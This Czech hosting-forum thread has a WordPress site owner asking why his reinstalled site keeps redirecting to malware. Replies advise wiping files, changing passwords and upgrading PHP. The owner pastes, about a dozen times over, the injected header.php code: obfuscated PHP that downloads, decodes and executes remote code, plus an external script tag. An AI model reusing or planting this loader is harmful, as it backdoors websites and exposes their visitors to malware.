Stále směrování webů na jiné weby
Dobrý den,
řešil jsem to tu již včera, že na kostelanymtb.cz, jakmile tam nahraji wordpress, tak po jisté „chvíli“ se začnou weby směrovat (jakoby malwarem) jinam. Schválně jsem weby udělal na https://kostelany.webkrom.cz a vše vpořádku. Jakmile jsem přenesl weby, které na webkrom.cz chodí bez problému, na kostelanymtb.cz, opět naskočilo ono přesměrování. Heslo databáze i FTP jsem změnil chvíli před převedením webů, takže zásah do FTP nemohl být. Také nového admina, s přihl. jménem jiným než admin jsem vytvořil a zároveň starého admina smazal a nic. Nechápu, kde může být ještě problém, ale už nevidím žádné řešení nikde 🙁
5 Answers
Dobrý den,
kde vidíte malware? kostelanymtb.cz/wp-admin se mi v pořádku zobrazuje.
Zjistil jsem, že se stále „automaticky“ přidává do header.php v themes řádek se scriptem:
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script>/**
Jenže netuším, odkud se tam bere. Jak jsem již zmiňoval, vymazal jsem vše z webu, udělal čistou instalaci, změnil hesla a řádek se objevuje stále. Prosím o pomoc a radu. Děkuji
Dobrý den,
pokud máte napadaný web, tak musíte FTP kompletně promazat a vymazat všechny adresáře znovu.
Důležité je také nikdy nepoužívat stejné heslo, takže jej změňte, jak na FTP, DB tak i případně do samotného webu.
Také záleží jestli máte PHP na verzi alespoň 7.0 a vyšší, starší verze jsou totiž značné bezpečnostní riziko.
Přesně to jsem udělal. Smazal jsem vše, změnil všude hesla za dost bezpečná a nainstaloval znovu wordpress s novou databází. Vše chodilo docela dobře do doby, než jsem do htacces dal příkaz na přesměrování na https. Poté vše spadlo a mám opět toho vira. Proto si myslím, že problém nebude zde. Možná někde v nastavení, přesměrování, nebo já vážně netuším? Můžete, prosím, zkontrolovat záznamy související s webem a prověřit to? Není přece možné, když vše smažu a změním hesla, aby hned při vnucení přesměrování na https
# presmerovani z http na https
RewriteCond %{HTTPS} off
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301])
mě to nasměrovalo na malware. Ne u kostelanymtb.cz, ale u kostelanymtb.cz/wp-admin
Vážně již nevím, co mám dělat. Děkuji
Dokonce jsem svůj PC dal do továru se smazáním všeho, tak jsem byl už v koncích a stále jsem 🙁